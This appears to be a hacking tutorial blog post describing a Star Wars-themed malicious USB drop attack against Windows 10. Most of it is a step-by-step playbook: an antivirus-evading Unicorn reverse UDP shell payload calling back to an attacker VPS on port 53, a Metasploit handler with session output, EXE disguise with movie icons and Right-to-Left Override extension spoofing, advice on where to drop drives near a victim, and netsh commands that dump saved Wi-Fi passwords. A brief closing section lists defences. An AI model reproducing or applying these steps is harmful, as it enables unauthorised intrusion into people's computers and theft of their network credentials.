The latest Star Wars movie, Solo: A Star Wars Story, has grossed almost $350 million worldwide during its first month in theaters. This is a good opportunity to discuss how hackers can use media hype (in this case, Hollywood movie hype) to disarm an unsuspecting Windows user into inserting an evil USB stick into their computer.
A long time ago, in a galaxy far, far away … a study was conducted that involved 300 malicious USB sticks being dropped by researchers on a university campus in Illinois. Nearly 50% of the USB thumb drives were picked up, and at least one file on each of those USB drives was clicked on.
The data showed that attaching keys to the USB’s keyring increased the likeliness of the flash drive being inserted into a computer. The presence of keys, no doubt, reinforced the belief that the keys and USB stick were lost and not placed on the ground by a hacker. The data also suggests that USB sticks labeled „Pictures“ or „Winter Break Pictures“ are more likely to be inserted by the victim. The addition of keys and label is something to consider when performing USB drops.
The researchers‘ experiment was targeted at university students and professors. It exploited their gullibleness to believe a student could lose their USB flash drive on school property. But what if the target Wi-Fi router isn’t located at a university?
This type of attack does not have to use the Star Wars franchise as a theme, I’m just a big an of the movies. During a reconnaissance phase, it may be discovered that a target user is wildly obsessed with zombie movies and TV shows. In that scenario, loading the USB stick with content inspired by The Walking Dead or something by an acclaimed horror movie filmmaker would make more sense. The point is to label the USB stick and fill it with content the intended victim will find hard to ignore. Make it enticing and exciting.
This attack was performed against a Windows 10 Enterprise machine with Avast antivirus installed
Step 1. Purchase the USB Drives & Keys
At least one USB flash drive is required for this attack. At the time of this writing, USB sticks can be purchased in bulk using websites like Amazon, Best Buy, and Newegg. I found it’s usually possible to find 10 USB thumb drives for roughly $20 USD. Keep in mind, these prices and deals will change over time.
You could go for some larger storage capacities, such as 16 GB, to really sell the idea that a movie is on there, but chances are, the user won’t even notice the size unless it’s written right on the stick, so a smaller, cheaper one will work just fine.
The addition of keys attached to the USB’s keyring will likely increase the likeliness of the USB stick being picked up and used. A local hardware store might be a good place to start looking for stock and inexpensive keys. However, the acquisition of keys is optional. You could use keys from a portable lock or house keys that come with new door knobs — any kind can work if you want to attach keys.
Step 2. Setup the VPS & Install Metasploit
A virtual private server (VPS) is needed to host the Metasploit listener. This will allow attackers to execute commands and dump Wi-Fi passwords on the compromised Windows computers. Install the latest version of Metasploit on a VPS with at least 1 GB RAM.
Step 3. Clone the Unicorn Repository
In a local Kali machine (not on the VPS), use Unicorn to create an undetectable payload. Unicorn is an excellent tool for generating sophisticated payloads capable of bypassing antivirus software. Readers who might’ve missed our article on creating an undetectable payload for Windows 10 should review it as many of the techniques shown there have been adapted into this demo.
After cloning Unicorn, change into the unicorn/ directory, and generate a payload using the below command.
python unicorn.py windows/shell/reverse_udp 126.96.36.199 53
This payload will create a reverse UDP connection (reverse_udp) to the attacker’s IP address for the VPS (188.8.131.52) on port number 53. The usage of UDP on port 53 is done in an effort to further disguise the payload and its network activity. Anyone that might be inspecting internet traffic transmitting to and from the compromised Windows computer may confuse the packets for ordinary DNS activity. It won’t make it impossible to discover the nefarious packets, but it may aid in evading deep packet inspection (DPI).
Step 4. Save the Payload
Then, use cat to view the newly created powershell_attack.txt file in the unicorn/ directory. Highlight the entire PowerShell command and save it to a Windows 10 machine with the file name payload.bat.
Step 5. Download Star Wars Images & Windows 10 Icons
Readers can source all kinds of images to serve as file icons. I loaded the USB sticks with multiple payloads, so several pictures were used. These payloads were intermixed with fake Windows 10 files which are also malicious files made to appear ordinary. The fake ZIP file in the below image is a good example of that.
Step 6. Convert the Images to Icons
After deciding on which images and icons will be used, they should be converted using ConvertICO. Simply upload the desired images to the website and it will reproduce them in ICO format. Save the new ICOs to the Windows 10 machine.
Step 7. Set Up & Install B2E on Windows 10
Then, download and install B2E, a Windows tool designed to convert files into executables. This has been covered several times before, so I’ll move on.
Step 8. Convert the PowerShell Payload to an Executable
When B2E is done installing, import the payload.bat and select the desired ICO. Click the „Convert“ button to create the EXE, and save the file.
This one payload.bat can be used over and over again to create multiple fake files. Just continue to change the ICO files (converted in the previous step) and export using different file names. Each file will appear to be a different image (or file) but really execute the same payload, creating multiple connections to the target Windows computer.
Step 9. Spoof the File Extensions
When all of the EXEs have been created, rename the files and inject the Right-to-Left Override (RLO) Unicode character to spoof the extensions.
The SCR file extension can be substituted for the EXE extension without affecting the payload. This is one of several possible file extension substitutions that allow hackers to cleverly run EXEs. The payload will still execute normally and the SCR extension („RCS“ when reversed by RLO) is a lot less obvious than keeping the „EXE“ in the file name.
As shown in the above GIF, all of the files should have their file names and extensions spoofed to appear as ordinary files on the USB drive. If more than one USB stick is being used in the attack, the payloads with spoofed file extensions should be copied to every single USB drive being dropped.
Step 10. Start Metasploit
With the payloads ready to go, it’s now safe to start Metasploit on the VPS. In the unicorn/ directory, there’s a unicorn.rc resource file used to automate the msfconsole initialization. The resource file should be copied to the VPS. Msfconsole can be started using the below screen msfconsole -r /path/to/unicorn/unicorn.rc command.
screen msfconsole -r /path/to/unicorn/unicorn.rc MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMM MMMN$ vMMMM MMMNl MMMMM MMMMM JMMMM MMMNl MMMMMMMN NMMMMMMM JMMMM MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMNM MMMMMMM MMMMM jMMMM MMMNI WMMMM MMMMMMM MMMM# JMMMM MMMMR ?MMNM MMMMM .dMMMM MMMMNm `?MMM MMMM` dMMMMM MMMMMMN ?MM MM? NMMMMMN MMMMMMMMNe JMMMMMNMMM MMMMMMMMMMNm, eMMMMMNMMNMM MMMMNNMNMMMMMNx MMMMMMNMMNMMNM MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM https://metasploit.com =[ metasploit v4.16.60-dev ] + -- --=[ 1771 exploits - 1010 auxiliary - 307 post ] + -- --=[ 537 payloads - 41 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] [*] Processing /opt/unicorn/unicorn.rc for ERB directives. resource (/opt/unicorn/unicorn.rc)> use multi/handler resource (/opt/unicorn/unicorn.rc)> set payload windows/shell/reverse_udp payload => windows/shell/reverse_udp resource (/opt/unicorn/unicorn.rc)> set LHOST 184.108.40.206 LHOST => 220.127.116.11 resource (/opt/unicorn/unicorn.rc)> set LPORT 53 LPORT => 53 resource (/opt/unicorn/unicorn.rc)> set ExitOnSession false ExitOnSession => false resource (/opt/unicorn/unicorn.rc)> set EnableStageEncoding true EnableStageEncoding => true resource (/opt/unicorn/unicorn.rc)> exploit -j [*] Exploit running as background job 0. [*] Started reverse handler on 18.104.22.168:53 msf exploit(multi/handler) >
For those unfamiliar, „Screen“ is a program that allows users to manage multiple terminal sessions within the same console. It has the ability to „detach,“ or close, the terminal window without losing any data running in the terminal. Prepending it to the command will allow attackers to exit their SSH session to the VPS without closing the msfconsole listener.
Step 11. Label & Drop the USB Sticks
Where and how to drop the USB stick(s) varies based on the scenario. If just one individual is being targeted, it would make sense to drop the USB stick near or around their desk, office, driveway, porch, or apartment door.
For a mass attack, where a large group of people has access to the target Wi-Fi network, it would be better to drop the USB flash drives in common rooms, parking lots, and community areas to maximize the exposure of the USB drives to as many individuals as possible.
Step 12. Dump the Wi-Fi Passwords (Post-Exploitation)
When files on a USB drive are opened, a new connection will be established to the VPS. From the msfconsole terminal, use the sessions command to view compromised Windows machines.
msf exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell x86/windows Microsoft Windows [Version 10.0.16299.431] (c) 2017 Microsoft Corporation. Al... 22.214.171.124:53 -> x.x.x.x:53480 (x.x.x.x)
Interact with the session „Id“ using the -i argument (session -i 1).
session -i 1 msf exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1... Microsoft Windows [Version 10.0.16299.431] (c) 2017 Microsoft Corporation. All rights reserved. C:\Users\IEUser>
At this point, the attacker will be set into a low-privileged Windows (cmd) console. Use the below netsh wlan show profiles command to view Wi-Fi networks the Windows machine has connected to in the past.
C:\Users\IEUser> netsh wlan show profiles Profiles on interface Wi-Fi: Group policy profiles (read only) --------------------------------- <None> User profiles ------------- All User Profile : 446CF4 All User Profile : Tatooine All User Profile : 3PVXQ All User Profile : Stewie All User Profile : FiOS-6DH1H All User Profile : attwifi All User Profile : Death Star All User Profile : Belkin.4412 All User Profile : garden-guest All User Profile : Jedi Temple All User Profile : cradle233 All User Profile : Lando Calrissian All User Profile : TransitWirelessWiFi All User Profile : StudioWifi All User Profile : ACE Lobby All User Profile : Lark Cafe All User Profile : D9F9AD
To view the password for a particular Wi-Fi network, use the name and key arguments. The password („Attack of The Clones“) can be found on the „Key Content“ line.
C:\Users\IEUser> netsh wlan show profile name="Tatooine" key=clear Profile Tatooine on interface Wi-Fi: ======================================================================= Applied: All User Profile Profile information ------------------- Version : 1 Type : Wireless LAN Name : Tatooine Control options : Connection mode : Connect automatically Network broadcast : Connect only if this network is broadcasting AutoSwitch : Do not switch to other networks MAC Randomization : Disabled Connectivity settings --------------------- Number of SSIDs : 1 SSID name : "Tatooine" Network type : Infrastructure Radio type : [ Any Radio Type ] Vendor extension : Not present Security settings ----------------- Authentication : WPA2-Personal Cipher : CCMP Authentication : WPA2-Personal Cipher : GCMP Security key : Present Key Content : Attack of The Clones Cost settings ------------- Cost : Unrestricted Congested : No Approaching Data Limit : No Over Data Limit : No Roaming : No Cost Source : Default
The best thing to do when you’ve discovered a rogue USB drive is to leave it alone. If there are keys attached to the USB stick and you feel compelled to return them, its okay to be a Good Samaritan — but don’t try to find out what’s on the USB storage device. As for remediations, the researchers recommend the following.
- Triple check the USB drive. If the drive seems to be too small for what you think is contained on it, it’s likely there’s a payload on their waiting for you. Some drives state the storage capacity on them; don’t try to plug it in to see.
- Ban USB drives altogether. While not a very well known feature, Windows lets users ban the use of USB drives for their computers by denying access to the Usbstor.inf file. If it’s your workplace, it’s not unjust to ban USB accessories on your work computers since there’s always cloud storage and fast internet connections.
- Prevent USB devices from working. If you don’t want to ban USB drives altogether, you can use a tool such as killusb to instantly reboot whenever an unknown, untrusted USB device is connected.
- Don’t touch unknown USB sticks. Unless you’re in a Taco Bell commercial, you should simply resist the urge to plug any USB stick that you are less than 100% certain is safe into any computer or device you own. If you can practice restraint here, all of the above tips should be useless to you. If you really can’t help yourself, use an isolated and offline computer — not your primary, work, school, etc. laptop.
- Educate computer users. If your relatives, family, friends, and coworkers don’t know any better, there’s nothing stopping them from being taken advantage of. To prevent this, simply let them know about the danger of plugging in untrusted USB devices.
If you just can’t help yourself from plugging in a random USB device, then at least:
- View the details. Use the „Detailed“ layout view in Windows‘ File Manager. This will display file type information and may help you spot strange or suspicious file types.
- Always shown file extensions. Make sure file type extensions are not „Hidden.“